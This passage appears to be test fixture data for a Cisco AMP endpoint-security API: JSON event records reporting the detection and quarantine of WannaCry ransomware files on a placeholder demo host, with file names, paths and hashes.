Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"